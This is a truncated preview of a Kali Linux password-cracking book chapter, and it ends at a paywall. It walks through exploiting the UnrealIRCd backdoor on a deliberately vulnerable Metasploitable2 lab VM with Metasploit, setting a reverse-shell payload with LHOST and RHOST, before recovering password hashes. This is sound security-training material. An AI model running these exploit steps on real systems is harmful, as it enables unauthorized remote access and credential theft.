You're reading from Password Cracking with Kali Linux
Obtaining Linux Passwords
Metasploitable2 is a purposefully vulnerable Linux system. I cover it extensively in my Basic Kali book, so we will just quickly look at the exploit and password hash recovery here. We will use Kali Linux as our attacking system and use the Metasploit Framework to handle the exploit and hash recovery. We will use the UnrealIRCd backdoor exploit, and then pull the passwords from the system.
➢ Start your Metasploitable 2 VM
➢ On your Kali VM, run Metasploit
➢ In Metasploit enter, “use exploit/unix/irc/unreal_ircd_3281_backdoor”
➢ Enter, “set payload cmd/unix/reverse”
➢ set LHOST [Kali_IP]
➢ set RHOST [Metasploitable2_IP]
➢ And then, “exploit”
This will open a remote Linux command shell, so there won’t be a prompt. Just type...
The rest of the page is locked
You have been reading a chapter from
Password Cracking with Kali LinuxPublished in: Feb 2024Publisher: PacktISBN-13: 9781835888544
© 2024 Packt Publishing Limited All Rights Reserved